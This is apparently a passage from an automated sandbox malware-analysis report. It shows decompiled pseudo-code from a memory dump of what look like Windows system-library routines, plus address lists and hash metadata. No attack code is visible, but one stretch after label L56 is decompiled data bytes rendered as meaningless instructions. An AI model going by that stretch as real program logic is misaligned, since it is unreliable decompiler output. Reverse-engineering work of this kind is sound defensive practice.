						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0481AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x48c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x48c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x48c8628; // 0x0
							_t116 =  *0x48c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                        0x047fb94c
                                                        0x047fb956
                                                        0x047fb95c
                                                        0x047fb95e
                                                        0x047fb964
                                                        0x047fb969
                                                        0x047fb96d
                                                        0x047fb96d
                                                        0x047fb970
                                                        0x047fb974
                                                        0x047fb97a
                                                        0x047fbadf
                                                        0x047fbadf
                                                        0x047fbae2
                                                        0x047fbae4
                                                        0x047fbae6
                                                        0x047fbaf0
                                                        0x04842cb8
                                                        0x047fbaf6
                                                        0x047fbaf6
                                                        0x047fbaf6
                                                        0x047fbafd
                                                        0x047fbb1f
                                                        0x047fbb1f
                                                        0x047fbaff
                                                        0x047fbb00
                                                        0x047fbb00
                                                        0x047fbb03
                                                        0x047fbb03
                                                        0x047fbacb
                                                        0x047fbacf
                                                        0x047fbad0
                                                        0x047fbad1
                                                        0x047fbadc
                                                        0x047fbadc
                                                        0x047fb980
                                                        0x047fb980
                                                        0x047fb988
                                                        0x047fb98b
                                                        0x047fb98d
                                                        0x047fb990
                                                        0x047fb993
                                                        0x047fb999
                                                        0x047fb99b
                                                        0x047fb9a1
                                                        0x047fb9a5
                                                        0x047fb9aa
                                                        0x047fb9b0
                                                        0x047fb9bb
                                                        0x047fb9c0
                                                        0x047fb9c3
                                                        0x047fb9ca
                                                        0x047fb9cc
                                                        0x047fb9cf
                                                        0x047fb9d3
                                                        0x047fb9d7
                                                        0x047fba94
                                                        0x047fba94
                                                        0x047fba98
                                                        0x047fbaa3
                                                        0x04842ccb
                                                        0x047fbaa9
                                                        0x047fbaa9
                                                        0x047fbaa9
                                                        0x047fbab1
                                                        0x04842cd5
                                                        0x04842cdd
                                                        0x04842cdd
                                                        0x047fbabb
                                                        0x047fbabc
                                                        0x047fbac2
                                                        0x047fbac3
                                                        0x047fbac3
                                                        0x047fbac6
                                                        0x00000000
                                                        0x047fb9dd
                                                        0x047fb9dd
                                                        0x047fb9e7
                                                        0x047fb9e7
                                                        0x047fb9ec
                                                        0x047fb9ec
                                                        0x047fb9f1
                                                        0x047fb9f5
                                                        0x047fb9fa
                                                        0x047fba00
                                                        0x047fba0c
                                                        0x047fba10
                                                        0x047fba10
                                                        0x047fba12
                                                        0x047fba18
                                                        0x00000000
                                                        0x00000000
                                                        0x047fbb26
                                                        0x047fbb26
                                                        0x047fba1e
                                                        0x047fba1e
                                                        0x047fba23
                                                        0x047fba25
                                                        0x047fba2c
                                                        0x047fba30
                                                        0x047fba35
                                                        0x047fba35
                                                        0x047fba41
                                                        0x047fba46
                                                        0x047fba4c
                                                        0x047fba50
                                                        0x047fba54
                                                        0x047fba6a
                                                        0x047fba6e
                                                        0x047fba70
                                                        0x047fba74
                                                        0x047fba78
                                                        0x047fba7a
                                                        0x047fba7c
                                                        0x047fba8e
                                                        0x047fba90
                                                        0x047fba92
                                                        0x047fbb14
                                                        0x047fbb14
                                                        0x047fbb16
                                                        0x047fbb16
                                                        0x00000000
                                                        0x047fba7c
                                                        0x047fbb0a
                                                        0x047fbb0d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047fbb0f

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047FB9A5
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 885266447-0
                                                        • Opcode ID: 177992e6f3bc55c109cfa152937733b30debb9f4f89007cc2a02b0a2417eac45
                                                        • Instruction ID: a7c3d5cec26aa4d00abf5151f1ed7072bb69c2e61612dc8866176af209f30b70
                                                        • Opcode Fuzzy Hash: 177992e6f3bc55c109cfa152937733b30debb9f4f89007cc2a02b0a2417eac45
                                                        • Instruction Fuzzy Hash: DB514671A08341CFC720DF29C88092ABBE9FB88654F548D6EFA9587754E770F944CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04802581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E04802581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t257;
				signed char _t261;
				void* _t262;
				signed char _t263;
				signed int _t267;
				signed int _t269;
				intOrPtr _t271;
				signed int _t274;
				signed int _t281;
				signed int _t284;
				signed int _t292;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				unsigned int _t305;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t315;
				intOrPtr _t327;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t344;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				void* _t351;

				_t348 = _t350;
				_t351 = _t350 - 0x4c;
				_v8 =  *0x48cd360 ^ _t348;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t343 = 0x48cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t305 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t298 = 0x48;
				_t325 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t336 = 0;
				_v37 = _t325;
				if(_v48 <= 0) {
					L16:
					_t45 = _t298 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t344 = 0xc0000106;
						goto L32;
					} else {
						_t343 = L047F4620(_t305,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t298);
						_v52 = _t343;
						__eflags = _t343;
						if(_t343 == 0) {
							_t344 = 0xc0000017;
							goto L32;
						} else {
							 *(_t343 + 0x44) =  *(_t343 + 0x44) & 0x00000000;
							_t50 = _t343 + 0x48; // 0x48
							_t338 = _t50;
							_t325 = _v32;
							 *(_t343 + 0x3c) = _t298;
							_t300 = 0;
							 *((short*)(_t343 + 0x30)) = _v48;
							__eflags = _t325;
							if(_t325 != 0) {
								 *(_t343 + 0x18) = _t338;
								__eflags = _t325 - 0x48c8478;
								 *_t343 = ((0 | _t325 == 0x048c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0481F3E0(_t338,  *((intOrPtr*)(_t325 + 4)),  *_t325 & 0x0000ffff);
								_t325 = _v32;
								_t351 = _t351 + 0xc;
								_t300 = 1;
								__eflags = _a8;
								_t338 = _t338 + (( *_t325 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t292 = E048639F2(_t338);
									_t325 = _v32;
									_t338 = _t292;
								}
							}
							_t309 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t344 = _v68;
								__eflags = 0;
								 *((short*)(_t338 - 2)) = 0;
								goto L32;
							} else {
								_t298 = _t343 + _t300 * 4;
								_v56 = _t298;
								do {
									__eflags = _t325;
									if(_t325 != 0) {
										_t257 =  *(_v60 + _t309 * 4);
										__eflags = _t257;
										if(_t257 == 0) {
											goto L30;
										} else {
											__eflags = _t257 == 5;
											if(_t257 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t298 =  *(_v60 + _t309 * 4);
										 *(_t298 + 0x18) = _t338;
										_t261 =  *(_v60 + _t309 * 4);
										__eflags = _t261 - 8;
										if(_t261 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t261 * 4 +  &M04802959))) {
												case 0:
													__ax =  *0x48c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0481F3E0(__edi,  *0x48c848c, __ax & 0x0000ffff);
														__eax =  *0x48c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0481F3E0(_t338, _v80, _v64);
													_t287 = _v64;
													goto L26;
												case 2:
													 *0x48c8480 & 0x0000ffff = E0481F3E0(__edi,  *0x48c8484,  *0x48c8480 & 0x0000ffff);
													__eax =  *0x48c8480 & 0x0000ffff;
													__eax = ( *0x48c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0481F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0481F3E0(_t338, _v76, _v36);
														_t287 = _v36;
													}
													L26:
													_t351 = _t351 + 0xc;
													_t338 = _t338 + (_t287 >> 1) * 2 + 2;
													__eflags = _t338;
													L27:
													_push(0x3b);
													_pop(_t289);
													 *((short*)(_t338 - 2)) = _t289;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0481F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x48c8478 & 0x0000ffff = E0481F3E0(__edi,  *0x48c847c,  *0x48c8478 & 0x0000ffff);
													__eax =  *0x48c8478 & 0x0000ffff;
													__eax = ( *0x48c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E048639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x48c6e58 & 0x0000ffff = E0481F3E0(__edi,  *0x48c6e5c,  *0x48c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x48c6e58 & 0x0000ffff;
													__eax = ( *0x48c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t309 = _v16;
													_t325 = _v32;
													L29:
													_t298 = _t298 + 4;
													__eflags = _t298;
													_v56 = _t298;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t309 = _t309 + 1;
									_v16 = _t309;
									__eflags = _t309 - _v48;
								} while (_t309 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t261 =  *(_v60 + _t336 * 4);
						if(_t261 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t261 * 4 +  &M04802935))) {
							case 0:
								__ax =  *0x48c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t325 =  &_v64;
								_v80 = E04802E3E(0,  &_v64);
								_t298 = _t298 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x48c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x48c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E047EEEF0(0x48c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E047EEB70(__ecx, 0x48c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t235 = _v72;
											__eflags = _t235;
											if(_t235 != 0) {
												L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t235);
											}
											_t236 = _v52;
											__eflags = _t236;
											if(_t236 != 0) {
												__eflags = _t344;
												if(_t344 < 0) {
													L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t236);
													_t236 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t305 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x48c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E047EEB70(__ecx, 0x48c79a0);
										__eax = _v52;
										L36:
										_pop(_t337);
										_pop(_t345);
										__eflags = _v8 ^ _t348;
										_pop(_t299);
										return E0481B640(_t236, _t299, _v8 ^ _t348, _t325, _t337, _t345);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t294 = _v56;
								if(_v56 != 0) {
									_t325 =  &_v36;
									_t296 = E04802E3E(_t294,  &_v36);
									_t305 = _v36;
									_v76 = _t296;
								}
								if(_t305 == 0) {
									goto L44;
								} else {
									_t298 = _t298 + 2 + _t305;
								}
								goto L14;
							case 6:
								__eax =  *0x48c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x48c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x48c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x48c6e58 & 0x0000ffff;
								__eax = ( *0x48c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t336 = _t336 + 1;
								if(_t336 >= _v48) {
									goto L16;
								} else {
									_t325 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t310 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t343 =  *_t343 + 0x28;
					 *_t261 =  *_t261 + 0x27;
					 *((char*)(_t343 + _t348)) =  *((char*)(_t343 + _t348)) + 0x26;
					 *((char*)(_t343 + _t261 * 2)) =  *((char*)(_t343 + _t261 * 2)) + 0x28;
					 *((char*)(_t261 + 0x1f048026)) =  *((char*)(_t261 + 0x1f048026)) + 0x5b;
					__eflags =  *(_t351 + _t325 * 4) & _t261;
					 *((intOrPtr*)(_t261 - 0x7ba4cafc)) =  *((intOrPtr*)(_t261 - 0x7ba4cafc)) - _t261;
					_t262 = _t261 + 2;
					 *((intOrPtr*)(_t262 - 0x7fd77ffc)) =  *((intOrPtr*)(_t262 - 0x7fd77ffc)) - _t262;
					_t263 = _t262 + 0xf6;
					asm("daa");
					 *((char*)(_t343 + _t298)) =  *((char*)(_t343 + _t298)) + 0x28;
					 *((char*)(_t343 + _t310 * 2)) =  *((char*)(_t343 + _t310 * 2)) + 0x28;
					 *((char*)(_t298 * 2 - 0x27fb7fd9)) =  *((char*)(_t298 * 2 - 0x27fb7fd9)) + 0x5b;
					__eflags =  *(_t351 + _t343 * 4) & _t263;
					 *((intOrPtr*)(_t263 - 0x7ba3cbfc)) =  *((intOrPtr*)(_t263 - 0x7ba3cbfc)) - _t263;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x48aff00);
					E0482D08C(_t298, _t338, _t343);
					_v44 =  *[fs:0x18];
					_t339 = 0;
					 *_a24 = 0;
					_t302 = _a12;
					__eflags = _t302;
					if(_t302 == 0) {
						_t267 = 0xc0000100;
					} else {
						_v8 = 0;
						_t346 = 0xc0000100;
						_v52 = 0xc0000100;
						_t269 = 4;
						while(1) {
							_v40 = _t269;
							__eflags = _t269;
							if(_t269 == 0) {
								break;
							}
							_t315 = _t269 * 0xc;
							_v48 = _t315;
							__eflags = _t302 -  *((intOrPtr*)(_t315 + 0x47b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t284 = E0481E5C0(_a8,  *((intOrPtr*)(_t315 + 0x47b1668)), _t302);
									_t351 = _t351 + 0xc;
									__eflags = _t284;
									if(__eflags == 0) {
										_t346 = E048551BE(_t302,  *((intOrPtr*)(_v48 + 0x47b166c)), _a16, _t339, _t346, __eflags, _a20, _a24);
										_v52 = _t346;
										break;
									} else {
										_t269 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t269 = _t269 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t346;
						__eflags = _t346;
						if(_t346 < 0) {
							__eflags = _t346 - 0xc0000100;
							if(_t346 == 0xc0000100) {
								_t311 = _a4;
								__eflags = _t311;
								if(_t311 != 0) {
									_v36 = _t311;
									__eflags =  *_t311 - _t339;
									if( *_t311 == _t339) {
										_t346 = 0xc0000100;
										goto L76;
									} else {
										_t327 =  *((intOrPtr*)(_v44 + 0x30));
										_t271 =  *((intOrPtr*)(_t327 + 0x10));
										__eflags =  *((intOrPtr*)(_t271 + 0x48)) - _t311;
										if( *((intOrPtr*)(_t271 + 0x48)) == _t311) {
											__eflags =  *(_t327 + 0x1c);
											if( *(_t327 + 0x1c) == 0) {
												L106:
												_t346 = E04802AE4( &_v36, _a8, _t302, _a16, _a20, _a24);
												_v32 = _t346;
												__eflags = _t346 - 0xc0000100;
												if(_t346 != 0xc0000100) {
													goto L69;
												} else {
													_t339 = 1;
													_t311 = _v36;
													goto L75;
												}
											} else {
												_t274 = E047E6600( *(_t327 + 0x1c));
												__eflags = _t274;
												if(_t274 != 0) {
													goto L106;
												} else {
													_t311 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t346 = E04802C50(_t311, _a8, _t302, _a16, _a20, _a24, _t339);
											L76:
											_v32 = _t346;
											goto L69;
										}
									}
									goto L108;
								} else {
									E047EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t346 = _a24;
									_t281 = E04802AE4( &_v36, _a8, _t302, _a16, _a20, _t346);
									_v32 = _t281;
									__eflags = _t281 - 0xc0000100;
									if(_t281 == 0xc0000100) {
										_v32 = E04802C50(_v36, _a8, _t302, _a16, _a20, _t346, 1);
									}
									_v8 = _t339;
									E04802ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t267 = _t346;
					}
					L70:
					return E0482D0D1(_t267);
				}
				L108:
			}


















































                                                        0x04802584
                                                        0x04802586
                                                        0x04802590
                                                        0x04802596
                                                        0x04802597
                                                        0x04802598
                                                        0x04802599
                                                        0x0480259e
                                                        0x048025a4
                                                        0x048025a9
                                                        0x048025ac
                                                        0x048025ae
                                                        0x048025b1
                                                        0x048025b2
                                                        0x048025b5
                                                        0x048025b8
                                                        0x048025bb
                                                        0x048025bc
                                                        0x048025bf
                                                        0x048025c2
                                                        0x048025c5
                                                        0x048025c6
                                                        0x048025cb
                                                        0x048025ce
                                                        0x048025d8
                                                        0x048025dd
                                                        0x048025de
                                                        0x048025e1
                                                        0x048025e3
                                                        0x048025e9
                                                        0x048026da
                                                        0x048026da
                                                        0x048026dd
                                                        0x048026e2
                                                        0x04845b56
                                                        0x00000000
                                                        0x048026e8
                                                        0x048026f9
                                                        0x048026fb
                                                        0x048026fe
                                                        0x04802700
                                                        0x04845b60
                                                        0x00000000
                                                        0x04802706
                                                        0x04802706
                                                        0x0480270a
                                                        0x0480270a
                                                        0x0480270d
                                                        0x04802713
                                                        0x04802716
                                                        0x04802718
                                                        0x0480271c
                                                        0x0480271e
                                                        0x04845b6c
                                                        0x04845b6f
                                                        0x04845b7f
                                                        0x04845b89
                                                        0x04845b8e
                                                        0x04845b93
                                                        0x04845b96
                                                        0x04845b9c
                                                        0x04845ba0
                                                        0x04845ba3
                                                        0x04845bab
                                                        0x04845bb0
                                                        0x04845bb3
                                                        0x04845bb3
                                                        0x04845ba3
                                                        0x04802724
                                                        0x04802726
                                                        0x04802729
                                                        0x0480272c
                                                        0x0480279d
                                                        0x0480279d
                                                        0x048027a0
                                                        0x048027a2
                                                        0x00000000
                                                        0x0480272e
                                                        0x0480272e
                                                        0x04802731
                                                        0x04802734
                                                        0x04802734
                                                        0x04802736
                                                        0x04845bc1
                                                        0x04845bc1
                                                        0x04845bc4
                                                        0x00000000
                                                        0x04845bca
                                                        0x04845bca
                                                        0x04845bcd
                                                        0x00000000
                                                        0x04845bd3
                                                        0x00000000
                                                        0x04845bd3
                                                        0x04845bcd
                                                        0x0480273c
                                                        0x0480273c
                                                        0x04802742
                                                        0x04802747
                                                        0x0480274a
                                                        0x0480274d
                                                        0x04802750
                                                        0x00000000
                                                        0x04802756
                                                        0x04802756
                                                        0x00000000
                                                        0x04802902
                                                        0x04802908
                                                        0x0480290b
                                                        0x00000000
                                                        0x04802911
                                                        0x0480291c
                                                        0x04802921
                                                        0x00000000
                                                        0x04802921
                                                        0x00000000
                                                        0x00000000
                                                        0x04802880
                                                        0x04802887
                                                        0x0480288c
                                                        0x00000000
                                                        0x00000000
                                                        0x04802805
                                                        0x0480280a
                                                        0x04802814
                                                        0x04802816
                                                        0x00000000
                                                        0x00000000
                                                        0x0480281e
                                                        0x04802821
                                                        0x04802823
                                                        0x00000000
                                                        0x04802829
                                                        0x04802829
                                                        0x04802831
                                                        0x0480283c
                                                        0x0480283e
                                                        0x00000000
                                                        0x0480283e
                                                        0x00000000
                                                        0x00000000
                                                        0x0480284e
                                                        0x04802850
                                                        0x04802851
                                                        0x04802854
                                                        0x04802857
                                                        0x0480285a
                                                        0x0480285c
                                                        0x0480285d
                                                        0x00000000
                                                        0x00000000
                                                        0x0480275d
                                                        0x04802761
                                                        0x00000000
                                                        0x04802767
                                                        0x0480276e
                                                        0x04802773
                                                        0x04802773
                                                        0x04802776
                                                        0x04802778
                                                        0x0480277e
                                                        0x0480277e
                                                        0x04802781
                                                        0x04802781
                                                        0x04802783
                                                        0x04802784
                                                        0x00000000
                                                        0x00000000
                                                        0x04845bd8
                                                        0x04845bde
                                                        0x04845be4
                                                        0x04845be6
                                                        0x04845be8
                                                        0x04845be9
                                                        0x04845bee
                                                        0x04845bf8
                                                        0x04845bff
                                                        0x04845c01
                                                        0x04845c04
                                                        0x04845c07
                                                        0x04845c0b
                                                        0x04845c0d
                                                        0x04845c0d
                                                        0x04845c15
                                                        0x04845c18
                                                        0x04845c1b
                                                        0x04845c1b
                                                        0x04845c1e
                                                        0x00000000
                                                        0x00000000
                                                        0x048028c3
                                                        0x048028c8
                                                        0x048028d2
                                                        0x048028d4
                                                        0x048028d8
                                                        0x048028db
                                                        0x04845c26
                                                        0x04845c28
                                                        0x04845c2d
                                                        0x04845c2d
                                                        0x00000000
                                                        0x00000000
                                                        0x04845c34
                                                        0x04845c36
                                                        0x04845c49
                                                        0x04845c4e
                                                        0x04845c54
                                                        0x04845c5b
                                                        0x04845c5d
                                                        0x04845c60
                                                        0x04802788
                                                        0x04802788
                                                        0x0480278b
                                                        0x0480278e
                                                        0x0480278e
                                                        0x0480278e
                                                        0x04802791
                                                        0x00000000
                                                        0x00000000
                                                        0x04802756
                                                        0x04802750
                                                        0x00000000
                                                        0x04802794
                                                        0x04802794
                                                        0x04802795
                                                        0x04802798
                                                        0x04802798
                                                        0x00000000
                                                        0x04802734
                                                        0x0480272c
                                                        0x04802700
                                                        0x048025ef
                                                        0x048025ef
                                                        0x048025ef
                                                        0x048025f2
                                                        0x048025f8
                                                        0x00000000
                                                        0x00000000
                                                        0x048025fe
                                                        0x00000000
                                                        0x048028e6
                                                        0x048028ec
                                                        0x048028ef
                                                        0x048028f5
                                                        0x048028f8
                                                        0x048028f8
                                                        0x00000000
                                                        0x048028f8
                                                        0x00000000
                                                        0x00000000
                                                        0x04802866
                                                        0x04802866
                                                        0x04802876
                                                        0x04802879
                                                        0x00000000
                                                        0x00000000
                                                        0x048027e0
                                                        0x048027e7
                                                        0x048027e9
                                                        0x048027eb
                                                        0x04845afd
                                                        0x00000000
                                                        0x04845afd
                                                        0x00000000
                                                        0x00000000
                                                        0x04802633
                                                        0x04802638
                                                        0x0480263b
                                                        0x0480263c
                                                        0x0480263e
                                                        0x04802640
                                                        0x04802642
                                                        0x04802647
                                                        0x04802649
                                                        0x0480264e
                                                        0x04802650
                                                        0x04802653
                                                        0x04802659
                                                        0x048026a2
                                                        0x048026a7
                                                        0x048026ac
                                                        0x048026b2
                                                        0x04845b11
                                                        0x04845b15
                                                        0x04845b17
                                                        0x00000000
                                                        0x048026b8
                                                        0x048026b8
                                                        0x048026ba
                                                        0x048027a6
                                                        0x048027a6
                                                        0x048027a9
                                                        0x048027ab
                                                        0x048027b9
                                                        0x048027b9
                                                        0x048027be
                                                        0x048027c1
                                                        0x048027c3
                                                        0x048027c5
                                                        0x048027c7
                                                        0x04845c74
                                                        0x04845c79
                                                        0x04845c79
                                                        0x048027c7
                                                        0x00000000
                                                        0x048026c0
                                                        0x048026c0
                                                        0x048026c3
                                                        0x048026c6
                                                        0x048026c6
                                                        0x048026c9
                                                        0x048026c9
                                                        0x00000000
                                                        0x048026c9
                                                        0x048026ba
                                                        0x0480265b
                                                        0x0480265b
                                                        0x0480265e
                                                        0x04802667
                                                        0x0480266d
                                                        0x04802677
                                                        0x0480267c
                                                        0x0480267f
                                                        0x04802681
                                                        0x04845b49
                                                        0x04845b4e
                                                        0x048027cd
                                                        0x048027d0
                                                        0x048027d1
                                                        0x048027d2
                                                        0x048027d4
                                                        0x048027dd
                                                        0x04802687
                                                        0x04802687
                                                        0x0480268a
                                                        0x0480268b
                                                        0x0480268e
                                                        0x0480268f
                                                        0x04802691
                                                        0x04802696
                                                        0x04802698
                                                        0x0480269d
                                                        0x0480269f
                                                        0x00000000
                                                        0x0480269f
                                                        0x04802681
                                                        0x00000000
                                                        0x00000000
                                                        0x04802846
                                                        0x00000000
                                                        0x00000000
                                                        0x04802605
                                                        0x0480260a
                                                        0x0480260c
                                                        0x04802611
                                                        0x04802616
                                                        0x04802619
                                                        0x04802619
                                                        0x0480261e
                                                        0x00000000
                                                        0x04802624
                                                        0x04802627
                                                        0x04802627
                                                        0x00000000
                                                        0x00000000
                                                        0x04845b1f
                                                        0x00000000
                                                        0x00000000
                                                        0x04802894
                                                        0x0480289b
                                                        0x0480289d
                                                        0x048028a1
